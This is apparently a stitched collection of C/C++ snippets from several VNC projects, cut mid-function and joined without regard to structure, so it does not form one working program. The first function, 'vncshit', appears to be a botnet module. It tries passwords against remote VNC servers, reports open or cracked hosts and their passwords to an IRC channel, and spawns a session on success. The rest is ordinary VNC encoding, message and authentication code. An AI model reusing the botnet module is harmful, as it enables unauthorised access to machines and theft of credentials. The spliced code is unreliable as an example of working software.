int vncshit(EXINFO exinfo, char *passwd)
{
char sendbuf[IRCLINE];
struct sockaddr_in ssin;
SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
if (sock == INVALID_SOCKET)
return FALSE;
int m_majorVersion, m_minorVersion;
ssin.sin_addr.s_addr= finet_addr(exinfo.ip);
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(fconnect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
sprintf(sendbuf,"VNC[-] Could not connect to %s", exinfo.ip);
addlog(sendbuf);
return false;
}
rfbProtocolVersionMsg pv;
ReadExact(sock, pv, sz_rfbProtocolVersionMsg);
pv[sz_rfbProtocolVersionMsg] = 0;
m_majorVersion = rfbProtocolMajorVersion;
m_minorVersion = rfbProtocolMinorVersion;
if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) {
sprintf(sendbuf,"VNC[%d.%d] %s Auth ByPass Vuln!!!", m_majorVersion, m_minorVersion, exinfo.ip);
irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
addlog(sendbuf);
return false;
}
sprintf(pv,rfbProtocolVersionFormat,m_majorVersion,m_minorVersion);
WriteExact(sock, pv, sz_rfbProtocolVersionMsg);
CARD32 authScheme, authResult;
CARD8 challenge[CHALLENGESIZE];
ReadExact(sock,(char *)&authScheme, 4);
authScheme = Swap32IfLE(authScheme);
switch (authScheme) {
case rfbConnFailed:
sprintf(sendbuf,"VNC[-] %s connection failed", exinfo.ip);
//irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
//addlog(sendbuf);
return false;
case rfbNoAuth:
sprintf(sendbuf,"VNC[%d.%d] %s NoPass !!!", m_majorVersion, m_minorVersion, exinfo.ip);
irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
ExitThread(1);
addlog(sendbuf);
return false;
case rfbVncAuth:
{
ReadExact(sock ,(char *)challenge, CHALLENGESIZE);
if (strlen(passwd) > 8) {
passwd[8] = '\0';
}
vncEncryptBytes(challenge, passwd);
WriteExact(sock, (char *) challenge, CHALLENGESIZE);
ReadExact(sock, (char *) &authResult, 4);
authResult = Swap32IfLE(authResult);
switch (authResult) {
case rfbVncAuthOK:
sprintf(sendbuf,"CRACKED VNC[%d.%d] %s Pass-> %s !!!", m_majorVersion, m_minorVersion, exinfo.ip, passwd);
irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
vncSpawn(sock);
addlog(sendbuf);
return false;
case rfbVncAuthFailed:
sprintf(sendbuf,"VNC[%d.%d] %s failed pass: %s!", m_majorVersion, m_minorVersion, exinfo.ip , passwd);
//irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
//addlog(sendbuf);
return false;
case rfbVncAuthTooMany:
sprintf(sendbuf,"VNC[-] %s failed pass - too many tries!", exinfo.ip);
//irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
Sleep(10000);
//addlog(sendbuf);
return false;
default:
Sleep(3000);
sprintf(sendbuf,"VNC[-] %s authentication result:%d", exinfo.ip, (int)authResult);
irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
addlog(sendbuf);
return false;
}
break;
}
default:
sprintf(sendbuf,"VNC[-] %s Unknown authentication scheme from VNC server:%d", exinfo.ip);
// irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
//addlog(sendbuf);
return false;
}
closesocket(sock);
}
static void * clientInput(void *data)
{
svcInfoPtr psvc = (svcInfoPtr)data;
Log("clientInput Thread started(%d)\n", psvc->sock);
struct sockaddr_in addr;
socklen_t addrlen = sizeof(struct sockaddr_in);
getpeername(psvc->sock, (struct sockaddr *)&addr, &addrlen);
strcpy(psvc->host, inet_ntoa(addr.sin_addr));
Log("Client(%s) connected\n",psvc->host);
fd_set rfds, sfds;
struct timeval tv;
int n;
psvc->frame_sent = 0;
#ifdef PERFORMANCE_REPORT
psvc->frame_total = 0;
psvc->frame_capture = 0;
psvc->frame_compress = 0;
psvc->frame_colorspace = 0;
psvc->frame_tx = 0;
psvc->frame_client = 0;
gettimeofday(&tLast,NULL);
#endif /* PERFORMANCE_REPORT */
//LOCK(psvc->output_mutex);
//last_fbc_output_current = fbc_output_current;
//UNLOCK(psvc->output_mutex);
FBCCMD msgt, msg;
while (1) {
FD_ZERO(&rfds);
FD_SET(psvc->sock, &rfds);
//FD_ZERO(&sfds);
//FD_SET(psvc->sock, &sfds);
tv.tv_sec = 30;
tv.tv_usec = 0; // 50 msec
n = select(psvc->sock + 1, &rfds, /*&sfds*/ NULL, NULL, &tv);
if (n < 0) {
Err("ReadExact: select");
break;
}
if (psvc->sock == -1) {
Log("client disconnected\n");
break;
}
if (FD_ISSET(psvc->sock, &rfds) ) {
if( ReadExact(psvc, (char*)&msg, FBCCMD_HEADER) <= 0 ) {
Err("Read Err");
break;
}
if( msg.cmd == 'h')
{
while( 1 )
{
FD_ZERO(&rfds);
FD_SET(psvc->sock, &rfds);
tv.tv_sec = 0;
tv.tv_usec = 1000;
n = select(psvc->sock + 1, &rfds, /*&sfds*/ NULL, NULL, &tv);
if( n== 0) // no more packet
break;
if (FD_ISSET(psvc->sock, &rfds) ) {
if( ReadExact(psvc, (char*)&msgt, FBCCMD_HEADER) <= 0 ) {
Err("Read Err2\n");
break;
}
if( msgt.cmd == msg.cmd ) {// same update packet
//Log("skip same update cmd\n");
continue;
}
ProcessClientMessage(psvc, &msg);
msg = msgt;
}
break;
}
}
if( 0 == ProcessClientMessage(psvc, &msg) )
break;
}
/*
if (FD_ISSET(psvc->sock, &sfds) ) {
LOCK(psvc->output_mutex);
if( last_fbc_output_current != fbc_output_current )
{
//Log("output-start %d-%d\n",last_fbc_output_current,fbc_output_current);
//Log("client outbuf last:%d current:%d\n", last_fbc_output_current, fbc_output_current);
unsigned int size = fbc_output[last_fbc_output_current].size;
fbc_output[last_fbc_output_current].size = htonl(size);
//int result1, result2;
WriteExact(psvc, (const char*)&fbc_output[last_fbc_output_current], FBCCMD_HEADER);
WriteExact(psvc, (const char*)fbc_output[last_fbc_output_current].jpegBuf, size - FBCCMD_HEADER);
last_fbc_output_current = fbc_output_current;
//Log("output result(%d,%d:%d)\n", result1, result2,size);
}
UNLOCK(psvc->output_mutex);
}
*/
if (psvc->sock == -1) {
Log("client disconnected\n");
break;
}
}
ExitClient(psvc);
Log("clientInput Thread Exit\n");
return NULL;
}
void ClientConnection::ReadRRERect(rfbFramebufferUpdateRectHeader *pfburh)
{
// An RRE rect is always followed by a background color
// For speed's sake we read them together into a buffer.
char tmpbuf[sz_rfbRREHeader+4]; // biggest pixel is 4 bytes long
rfbRREHeader *prreh = (rfbRREHeader *) tmpbuf;
CARD8 *pcolor = (CARD8 *) tmpbuf + sz_rfbRREHeader;
ReadExact(tmpbuf, sz_rfbRREHeader + m_minPixelBytes);
prreh->nSubrects = Swap32IfLE(prreh->nSubrects);
SETUP_COLOR_SHORTCUTS;
COLORREF color;
switch (m_myFormat.bitsPerPixel) {
case 8:
color = COLOR_FROM_PIXEL8_ADDRESS(pcolor); break;
case 16:
color = COLOR_FROM_PIXEL16_ADDRESS(pcolor); break;
case 24:
case 32:
color = COLOR_FROM_PIXEL32_ADDRESS(pcolor); break;
}
// No other threads can use bitmap DC
omni_mutex_lock l(m_bitmapdcMutex);
// Draw the background of the rectangle
FillSolidRect_ultra(pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h, m_myFormat.bitsPerPixel,pcolor);
if (prreh->nSubrects == 0) return;
// Draw the sub-rectangles
rfbRectangle rect, *pRect;
// The size of an RRE subrect including color info
int subRectSize = m_minPixelBytes + sz_rfbRectangle;
// Read subrects into the buffer
CheckBufferSize(subRectSize * prreh->nSubrects);
ReadExact(m_netbuf, subRectSize * prreh->nSubrects);
BYTE *p = (BYTE *) m_netbuf;
for (CARD32 i = 0; i < prreh->nSubrects; i++) {
pRect = (rfbRectangle *) (p + m_minPixelBytes);
switch (m_myFormat.bitsPerPixel) {
case 8:
color = COLOR_FROM_PIXEL8_ADDRESS(p); break;
case 16:
color = COLOR_FROM_PIXEL16_ADDRESS(p); break;
case 32:
color = COLOR_FROM_PIXEL32_ADDRESS(p); break;
};
rect.x = (CARD16) (Swap16IfLE(pRect->x) + pfburh->r.x);
rect.y = (CARD16) (Swap16IfLE(pRect->y) + pfburh->r.y);
rect.w = Swap16IfLE(pRect->w);
rect.h = Swap16IfLE(pRect->h);
FillSolidRect_ultra(rect.x, rect.y, rect.w, rect.h, m_myFormat.bitsPerPixel,p);
p+=subRectSize;
}
}
void ClientConnection::ReadZlibRect(rfbFramebufferUpdateRectHeader *pfburh,int XOR) {
UINT numpixels = pfburh->r.w * pfburh->r.h;
// this assumes at least one byte per pixel. Naughty.
UINT numRawBytes = numpixels * m_minPixelBytes;
UINT numCompBytes;
int inflateResult;
rfbZlibHeader hdr;
// Read in the rfbZlibHeader
ReadExact((char *)&hdr, sz_rfbZlibHeader);
numCompBytes = Swap32IfLE(hdr.nBytes);
// Read in the compressed data
CheckBufferSize(numCompBytes);
ReadExact(m_netbuf, numCompBytes);
// Verify enough buffer space for screen update.
CheckZlibBufferSize(numRawBytes);
m_decompStream.next_in = (unsigned char *)m_netbuf;
m_decompStream.avail_in = numCompBytes;
m_decompStream.next_out = m_zlibbuf;
m_decompStream.avail_out = numRawBytes;
m_decompStream.data_type = Z_BINARY;
// Insure the inflator is initialized
if ( m_decompStreamInited == false ) {
m_decompStream.total_in = 0;
m_decompStream.total_out = 0;
m_decompStream.zalloc = Z_NULL;
m_decompStream.zfree = Z_NULL;
m_decompStream.opaque = Z_NULL;
inflateResult = inflateInit( &m_decompStream );
if ( inflateResult != Z_OK ) {
vnclog.Print(0, _T("zlib inflateInit error: %d\n"), inflateResult);
return;
}
m_decompStreamInited = true;
}
// Decompress screen data
inflateResult = inflate( &m_decompStream, Z_SYNC_FLUSH );
if ( inflateResult < 0 ) {
vnclog.Print(0, _T("zlib inflate error: %d\n"), inflateResult);
return;
}
SETUP_COLOR_SHORTCUTS;
if (XOR==3)
{
mybool *maskbuffer=(mybool *)m_zlibbuf;
BYTE *color=m_zlibbuf+(((pfburh->r.w*pfburh->r.h)+7)/8);
BYTE *color2=m_zlibbuf+(((pfburh->r.w*pfburh->r.h)+7)/8)+m_myFormat.bitsPerPixel/8;
// No other threads can use bitmap DC
omni_mutex_lock l(m_bitmapdcMutex);
// This big switch is untidy but fast
switch (m_myFormat.bitsPerPixel) {
case 8:
SETXORMONOPIXELS(maskbuffer,color2, color,8, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
case 16:
SETXORMONOPIXELS(maskbuffer,color2, color,16, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
case 24:
case 32:
SETXORMONOPIXELS(maskbuffer,color2, color,32, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
default:
vnclog.Print(0, _T("Invalid number of bits per pixel: %d\n"), m_myFormat.bitsPerPixel);
return;
}
}
inline Bool
HandleRFBServerMessage()
{
rfbServerToClientMsg msg;
if(!ReadExact(rfbsock, (char *)&msg, 1))
return False;
dprintf("HandleRFBServerMessage %d\n",msg.type);
switch(msg.type)
{
case rfbSetColourMapEntries:
{
dprintf("rfbSetColourMapEntries\n");
int i;
CARD16 rgb[3];
XColor xc;
if(!ReadExact(rfbsock, ((char *)&msg.scme) + 1,
sz_rfbSetColourMapEntriesMsg - 1))
return False;
msg.scme.firstColour = Swap16IfLE(msg.scme.firstColour);
msg.scme.nColours = Swap16IfLE(msg.scme.nColours);
INIT_PALETTE(msg.scme.nColours);
for(i = 0; i < msg.scme.nColours; i++)
{
xc.pixel = msg.scme.firstColour + i;
if(addUseAlpha)
{
if(!ReadExact(rfbsock, (char *)rgb, 8))
return False;
xc.transp = ((double)(0xff - (Swap16IfLE(rgb[0]) >> 8))) / ((double)0xff / (double)0xA0);
xc.red = Swap16IfLE(rgb[1]) >> 8;
xc.green = Swap16IfLE(rgb[2]) >> 8;
xc.blue = Swap16IfLE(rgb[3]) >> 8;
}
else
{
if(!ReadExact(rfbsock, (char *)rgb, 6))
return False;
xc.transp = 0;
xc.red = Swap16IfLE(rgb[0]) >> 8;
xc.green = Swap16IfLE(rgb[1]) >> 8;
xc.blue = Swap16IfLE(rgb[2]) >> 8;
}
xc.flags = DoRed|DoGreen|DoBlue;
INSERT_COLOUR (xc);
}
STORE_PALETTE(NULL);
break;
}
case rfbFramebufferUpdate:
{
dprintf("rfbFramebufferUpdate\n");
//ShowOsd(True);
rfbFramebufferUpdateRectHeader rect;
int linesToRead;
int bytesPerLine;
int i;
if(!ReadExact(rfbsock, ((char *)&msg.fu) + 1,
sz_rfbFramebufferUpdateMsg - 1))
return False;
msg.fu.nRects = Swap16IfLE(msg.fu.nRects);
dprintf("# Rect %d\n",msg.fu.nRects);
for(i = 0; i < msg.fu.nRects; i++)
{
if(!ReadExact(rfbsock, (char *)&rect,
sz_rfbFramebufferUpdateRectHeader))
return False;
rect.r.x = Swap16IfLE(rect.r.x);
rect.r.y = Swap16IfLE(rect.r.y);
rect.r.w = Swap16IfLE(rect.r.w);
rect.r.h = Swap16IfLE(rect.r.h);
rect.encoding = Swap32IfLE(rect.encoding);
dprintf("Rect x/y/w/h %d/%d/%d/%d %u\n",rect.r.x,rect.r.y,rect.r.w,rect.r.h, (uint)rect.encoding);
if((rect.r.x + rect.r.w > si.framebufferWidth) ||
(rect.r.y + rect.r.h > si.framebufferHeight))
{
fprintf(stderr,"%s: rect too large: %dx%d at (%d, %d)\n",
programName, rect.r.w, rect.r.h, rect.r.x, rect.r.y);
return False;
}
if((rect.r.h * rect.r.w) == 0)
{
fprintf(stderr,"%s: zero size rect - ignoring\n",programName);
continue;
}
switch(rect.encoding)
{
case rfbEncodingRaw:
bytesPerLine = rect.r.w * myFormat.bitsPerPixel / 8;
linesToRead = BUFFER_SIZE / bytesPerLine;
while(rect.r.h > 0)
{
if(linesToRead > rect.r.h)
linesToRead = rect.r.h;
if(!ReadExact(rfbsock, buffer,bytesPerLine * linesToRead))
return False;
CopyDataToScreen((CARD8 *)buffer, rect.r.x, rect.r.y,
rect.r.w, linesToRead);
rect.r.h -= linesToRead;
rect.r.y += linesToRead;
}
break;
case rfbEncodingCopyRect:
{
dprintf("rfbEncodingCopyRect\n");
rfbCopyRect cr;
if(!ReadExact(rfbsock, (char *)&cr, sz_rfbCopyRect))
return False;
cr.srcX = Swap16IfLE(cr.srcX);
cr.srcY = Swap16IfLE(cr.srcY);
COPY_AREA (cr.srcX, cr.srcY, rect.r.w, rect.r.h, rect.r.x, rect.r.y);
break;
}
case rfbEncodingRRE:
{
dprintf("RRE\n");
rfbRREHeader hdr;
CARD8 pix8;
CARD16 pix16;
CARD32 pix32;
rfbRectangle subrect;
int j;
int dataSize;
char *netbuff;
char *p;
if(!ReadExact(rfbsock, (char *)&hdr, sz_rfbRREHeader))
return False;
hdr.nSubrects = Swap32IfLE(hdr.nSubrects);
switch(myFormat.bitsPerPixel)
{
case 8:
if(!ReadExact(rfbsock, (char *)&pix8, 1))
return False;
FILL_RECTNOREDRAW (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix8);
dataSize = (sizeof(pix8) + sz_rfbRectangle) * hdr.nSubrects;
netbuff = malloc(dataSize + 256);
if(!ReadExact(rfbsock, netbuff, dataSize))
return False;
p = netbuff;
for(j = 0; j < hdr.nSubrects; j++)
{
memcpy((char*)&pix8, p, sizeof(pix8));
p += sizeof(pix8);
memcpy((char*)&subrect, p, sz_rfbRectangle);
p += sz_rfbRectangle;
subrect.x = Swap16IfLE(subrect.x);
subrect.y = Swap16IfLE(subrect.y);
subrect.w = Swap16IfLE(subrect.w);
subrect.h = Swap16IfLE(subrect.h);
FILL_RECTNOREDRAW (rect.r.x + subrect.x, rect.r.y + subrect.y,
subrect.w, subrect.h, pix8);
}
free(netbuff);
REDRAWBOX(rect.r.x, rect.r.y, rect.r.w, rect.r.h);
break;
case 16:
if(!ReadExact(rfbsock, (char *)&pix16, 2))
return False;
FILL_RECTNOREDRAW (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix16);
dataSize = (sizeof(pix16) + sz_rfbRectangle) * hdr.nSubrects;
netbuff = malloc(dataSize + 256);
if(!ReadExact(rfbsock, netbuff, dataSize))
return False;
p = netbuff;
for(j = 0; j < hdr.nSubrects; j++)
{
memcpy((char*)&pix16, p, sizeof(pix16));
p += sizeof(pix16);
memcpy((char*)&subrect, p, sz_rfbRectangle);
p += sz_rfbRectangle;
subrect.x = Swap16IfLE(subrect.x);
subrect.y = Swap16IfLE(subrect.y);
subrect.w = Swap16IfLE(subrect.w);
subrect.h = Swap16IfLE(subrect.h);
FILL_RECTNOREDRAW (rect.r.x + subrect.x, rect.r.y + subrect.y,
subrect.w, subrect.h, pix16);
}
free(netbuff);
REDRAWBOX(rect.r.x, rect.r.y, rect.r.w, rect.r.h);
break;
case 32:
if(!ReadExact(rfbsock, (char *)&pix32, 4))
return False;
FILL_RECTNOREDRAW (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix32);
dataSize = (sizeof(pix32) + sz_rfbRectangle) * hdr.nSubrects;
netbuff = malloc(dataSize + 256);
if(!ReadExact(rfbsock, netbuff, dataSize))
return False;
p = netbuff;
for(j = 0; j < hdr.nSubrects; j++)
{
memcpy((char*)&pix32, p, sizeof(pix32));
p += sizeof(pix32);
memcpy((char*)&subrect, p, sz_rfbRectangle);
p += sz_rfbRectangle;
subrect.x = Swap16IfLE(subrect.x);
subrect.y = Swap16IfLE(subrect.y);
subrect.w = Swap16IfLE(subrect.w);
subrect.h = Swap16IfLE(subrect.h);
FILL_RECTNOREDRAW (rect.r.x + subrect.x, rect.r.y + subrect.y,
subrect.w, subrect.h, pix32);
}
free(netbuff);
REDRAWBOX(rect.r.x, rect.r.y, rect.r.w, rect.r.h);
break;
}
break;
}
case rfbEncodingCoRRE:
{
dprintf("rfbEncodingCoRRE\n");
rfbRREHeader hdr;
CARD8 pix8;
CARD16 pix16;
CARD32 pix32;
int j;
CARD8 *ptr;
register int x, y, w, h;
if(!ReadExact(rfbsock, (char *)&hdr, sz_rfbRREHeader))
return False;
hdr.nSubrects = Swap32IfLE(hdr.nSubrects);
switch(myFormat.bitsPerPixel)
{
case 8:
if(!ReadExact(rfbsock, (char *)&pix8, 1))
return False;
FILL_RECT (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix8);
if(!ReadExact(rfbsock, buffer, hdr.nSubrects * 5))
return False;
ptr = (CARD8 *)buffer;
for(j = 0; j < hdr.nSubrects; j++)
{
pix8 = *ptr++;
x = *ptr++;
y = *ptr++;
w = *ptr++;
h = *ptr++;
FILL_RECT (rect.r.x + x, rect.r.y + y, w, h, pix8);
}
break;
case 16:
if(!ReadExact(rfbsock, (char *)&pix16, 2))
return False;
FILL_RECT (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix16);
if(!ReadExact(rfbsock, buffer, hdr.nSubrects * 6))
return False;
ptr = (CARD8 *)buffer;
for(j = 0; j < hdr.nSubrects; j++)
{
pix16 = *(CARD16 *)ptr;
ptr += 2;
x = *ptr++;
y = *ptr++;
w = *ptr++;
h = *ptr++;
FILL_RECT (rect.r.x + x, rect.r.y + y, w, h, pix16);
}
break;
case 32:
if(!ReadExact(rfbsock, (char *)&pix32, 4))
return False;
FILL_RECT (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix32);
if(!ReadExact(rfbsock, buffer, hdr.nSubrects * 8))
return False;
ptr = (CARD8 *)buffer;
for(j = 0; j < hdr.nSubrects; j++)
{
pix32 = *(CARD32 *)ptr;
ptr += 4;
x = *ptr++;
y = *ptr++;
w = *ptr++;
h = *ptr++;
FILL_RECT (rect.r.x + x, rect.r.y + y, w, h, pix32);
}
break;
}
break;
}
case rfbEncodingHextile:
{
dprintf("Hextile\n");
switch(myFormat.bitsPerPixel)
{
case 8:
if(!HandleHextileEncoding8(rect.r.x, rect.r.y,
rect.r.w, rect.r.h))
return False;
break;
case 16:
if(!HandleHextileEncoding16(rect.r.x, rect.r.y,
rect.r.w, rect.r.h))
return False;
break;
case 32:
if(!HandleHextileEncoding32(rect.r.x, rect.r.y,
rect.r.w, rect.r.h))
return False;
break;
}
break;
}
default:
printf("vnc: unknown rect encoding %u\n",(uint)rect.encoding);
return False;
}
}
//sendUpdateRequest = True;
break;
}
case rfbBell:
BELL;
//ShowOsd(False);
break;
case rfbServerCutText:
{
char *str;
if(!ReadExact(rfbsock, ((char *)&msg.sct) + 1,
sz_rfbServerCutTextMsg - 1))
return False;
msg.sct.length = Swap32IfLE(msg.sct.length);
str = malloc(msg.sct.length);
if(!ReadExact(rfbsock, str, msg.sct.length))
{
free(str);
return False;
}
/*
XSelectInput(dpy, DefaultRootWindow(dpy), 0);
XStoreBytes(dpy, str, msg.sct.length);
XSetSelectionOwner(dpy, XA_PRIMARY, None, CurrentTime);
XSelectInput(dpy, DefaultRootWindow(dpy), PropertyChangeMask);
*/
free(str);
break;
}
case rfbReSizeFrameBuffer:
{
if(!ReadExact(rfbsock, ((char *)&msg.rsfb) + 1,
sz_rfbReSizeFrameBufferMsg - 1))
return False;
dprintf("rfbReSizeFrameBuffer: %d/%d | %d/%d\n",msg.rsfb.buffer_w,msg.rsfb.buffer_h,msg.rsfb.desktop_w,msg.rsfb.desktop_h);
si.framebufferWidth = Swap16IfLE(msg.rsfb.buffer_w);
si.framebufferHeight = Swap16IfLE(msg.rsfb.buffer_h);
FILL_RECT(0, 0, si.framebufferWidth, si.framebufferHeight, 0);
if(!SendFramebufferUpdateRequest(0, 0, si.framebufferWidth,
si.framebufferHeight, False))
return False;
}
break;
default:
printf("%s: unknown message type %d from VNC server\n",
programName,msg.type);
return False;
}
static void
AuthPAMUserPwdRspFunc(rfbClientPtr cl)
{
CARD32 userLen;
CARD32 pwdLen;
char userBuf[MAX_USER_LEN + 1];
char pwdBuf[MAX_PWD_LEN + 1];
int n;
const char* emsg;
n = ReadExact(cl->sock, (char*) &userLen, sizeof(userLen));
if (n <= 0) {
if (n != 0)
rfbLogPerror("AuthPAMUserPwdRspFunc: read error");
rfbCloseSock(cl->sock);
return;
}
userLen = Swap32IfLE(userLen);
n = ReadExact(cl->sock, (char*) &pwdLen, sizeof(pwdLen));
if (n <= 0) {
if (n != 0)
rfbLogPerror("AuthPAMUserPwdRspFunc: read error");
rfbCloseSock(cl->sock);
return;
}
pwdLen = Swap32IfLE(pwdLen);
if ((userLen > MAX_USER_LEN) || (pwdLen > MAX_PWD_LEN)) {
rfbLogPerror("AuthPAMUserPwdRspFunc: excessively large user name or password in response");
rfbCloseSock(cl->sock);
return;
}
n = ReadExact(cl->sock, userBuf, userLen);
if (n <= 0) {
if (n != 0)
rfbLogPerror("AuthPAMUserPwdRspFunc: error reading user name");
rfbCloseSock(cl->sock);
return;
}
userBuf[userLen] = '\0';
n = ReadExact(cl->sock, pwdBuf, pwdLen);
if (n <= 0) {
if (n != 0)
rfbLogPerror("AuthPAMUserPwdRspFunc: error reading password");
rfbCloseSock(cl->sock);
return;
}
pwdBuf[pwdLen] = '\0';
if (rfbAuthUserACL) {
UserList* p = userACL;
if (p == NULL)
rfbLog("WARNING: User ACL is empty. No users will be allowed to log in with Unix login authentication.\n");
while (p != NULL) {
if (!strcmp(p->name, userBuf))
break;
p = p->next;
}
if (p == NULL) {
rfbLog("User '%s' is not in the ACL and has been denied access\n",
userBuf);
rfbClientAuthFailed(cl, "User denied access");
return;
}
cl->viewOnly = p->viewOnly;
}
if (rfbPAMAuthenticate(pamServiceName, cl->host, userBuf, pwdBuf, &emsg)) {
rfbClientAuthSucceeded(cl, rfbAuthUnixLogin);
} else {
rfbClientAuthFailed(cl, (char*)emsg);
}
}
void ClientConnection::ReadCoRRERect(rfbFramebufferUpdateRectHeader *pfburh)
{
// An RRE rect is always followed by a background color
// For speed's sake we read them together into a buffer.
char tmpbuf[sz_rfbRREHeader+4]; // biggest pixel is 4 bytes long
rfbRREHeader *prreh = (rfbRREHeader *) tmpbuf;
CARD8 *pcolor = (CARD8 *) tmpbuf + sz_rfbRREHeader;
ReadExact(tmpbuf, sz_rfbRREHeader + m_minPixelBytes);
prreh->nSubrects = Swap32IfLE(prreh->nSubrects);
SETUP_COLOR_SHORTCUTS;
COLORREF color;
switch (m_myFormat.bitsPerPixel) {
case 8:
color = COLOR_FROM_PIXEL8_ADDRESS(pcolor);
break;
case 16:
color = COLOR_FROM_PIXEL16_ADDRESS(pcolor);
break;
case 24:
case 32:
color = COLOR_FROM_PIXEL32_ADDRESS(pcolor);
break;
}
// Draw the background of the rectangle
FillSolidRect(pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h, color);
if (prreh->nSubrects == 0) return;
// Draw the sub-rectangles
rfbCoRRERectangle *pRect;
rfbRectangle rect;
// The size of an CoRRE subrect including color info
int subRectSize = m_minPixelBytes + sz_rfbCoRRERectangle;
// Read subrects into the buffer
CheckBufferSize(subRectSize * prreh->nSubrects);
ReadExact(m_netbuf, subRectSize * prreh->nSubrects);
BYTE *p = (BYTE *) m_netbuf;
{
boost::recursive_mutex::scoped_lock l(m_bitmapdcMutex);
\
ObjectSelector b(m_hBitmapDC, m_hBitmap);
\
PaletteSelector ps(m_hBitmapDC, m_hPalette);
\
for (CARD32 i = 0; i < prreh->nSubrects; i++) {
pRect = (rfbCoRRERectangle *) (p + m_minPixelBytes);
switch (m_myFormat.bitsPerPixel) {
case 8:
color = COLOR_FROM_PIXEL8_ADDRESS(p);
break;
case 16:
color = COLOR_FROM_PIXEL16_ADDRESS(p);
break;
case 32:
color = COLOR_FROM_PIXEL32_ADDRESS(p);
break;
};
// color = COLOR_FROM_PIXEL8_ADDRESS(netbuf);
rect.x = pRect->x + pfburh->r.x;
rect.y = pRect->y + pfburh->r.y;
rect.w = pRect->w;
rect.h = pRect->h;
FillSolidRect(rect.x, rect.y, rect.w, rect.h, color);
p+=subRectSize;
}
}
}
static void rfbProcessClientNormalMessage(rfbClientPtr cl)
{
int n=0;
rfbClientToServerMsg msg;
char *str;
int i;
// unsigned char keyvalue;
u32 enc;
// debug_printf("--In the NormalMessadge process!\n");
if ((n = ReadExact(cl, (char *)&msg, 1)) <= 0)
{
debug_printf("rfbProcessClientNormalMessage: read--type-error,shutdown clien!\n");
// delay(10);
rfbCloseClient(cl);
return;
}
// debug_printf("--In the NormalMessadge process!--has read msg type=%d \n",msg.type);
switch (msg.type) //根据收到的消息来对应的处理各种情况
{
case rfbSetPixelFormat://目前已经处理完备
debug_printf("SetPixelFormat!\n");
if ((n = ReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetPixelFormatMsg - 1)) <= 0)
{
debug_printf("rfbProcessClientNormalMessage: read--setpixelmessage-error,shutdown client!\n");
// delay(10000);
rfbCloseClient(cl);
return;
}
cl->format.bitsPerPixel = msg.spf.format.bitsPerPixel;
cl->format.depth = msg.spf.format.depth;
cl->format.bigEndian = (msg.spf.format.bigEndian ? 1 : 0);
cl->format.trueColour = (msg.spf.format.trueColour ? 1 : 0);
cl->format.redMax = Swap16IfLE(msg.spf.format.redMax);
cl->format.greenMax = Swap16IfLE(msg.spf.format.greenMax);
cl->format.blueMax = Swap16IfLE(msg.spf.format.blueMax);
cl->format.redShift = msg.spf.format.redShift;
cl->format.greenShift = msg.spf.format.greenShift;
cl->format.blueShift = msg.spf.format.blueShift;
cl->readyForSetColourMapEntries = TRUE;
//这个是必须要处理的,因为当客户端发送的信息是颜色不是真彩色的话,必须要发送服务器的映射方法。
debug_printf("got the client set pixformat=%s\n",cl->host);
showPixelFormat(&(cl->format));
// deug_printf("--set the client color translate begin!\n");
rfbSetTranslateFunction(cl);
// debug_printf("--set the client color end!\n");
return;
case rfbFixColourMapEntries:
debug_printf("rfbFixColourMapEntries!\n");
if ((n = ReadExact(cl, ((char *)&msg) + 1,
sz_rfbFixColourMapEntriesMsg - 1)) <= 0) {
debug_printf("rfbProcessClientNormalMessage: read--fixpixelmessage-error,shutdown client!\n");
delay(10000);
rfbCloseClient(cl);
return;
}
debug_printf("FixColourMapEntries unsupported\n");
rfbCloseClient(cl);
return;
case rfbSetEncodings://目前已经处理完备
{
//debug_printf("rfbSetEncodings!\n");
if ((n = ReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetEncodingsMsg - 1)) <= 0) {
debug_printf("rfbProcessClientNormalMessage: read--rfbSetEncodings-error,shutdown client!\n");
delay(10000);
rfbCloseClient(cl);
return;
}
msg.se.nEncodings = Swap16IfLE(msg.se.nEncodings);
cl->preferredEncoding = -1;
cl->useCopyRect = FALSE;
cl->enableCursorShapeUpdates = FALSE;
cl->enableLastRectEncoding = FALSE;
for (i = 0; i < msg.se.nEncodings; i++) {
if ((n = ReadExact(cl, (char *)&enc, 4)) <= 0) {
debug_printf("rfbProcessClientNormalMessage: read--rfbSetEncodings-error,shutdown client!\n");
delay(10000);
rfbCloseClient(cl);
return;
}
enc = Swap32IfLE(enc);
switch (enc) {
case rfbEncodingCopyRect:
debug_printf("client %s supported rfbEncodingCopyRect\n",cl->host);
cl->useCopyRect = TRUE;
break;
case rfbEncodingRaw:
debug_printf("client %s supported rfbEncodingRaw\n",cl->host);
if (cl->preferredEncoding == -1) {
cl->preferredEncoding = enc;
debug_printf("Using raw encoding for client %s\n",
cl->host);
}
break;
case rfbEncodingRRE:
debug_printf("client %s supported rfbEncodingRRE\n",cl->host);
if (cl->preferredEncoding == -1) {
cl->preferredEncoding = enc;
debug_printf("Using rre encoding for client %s\n",
cl->host);
}
break;
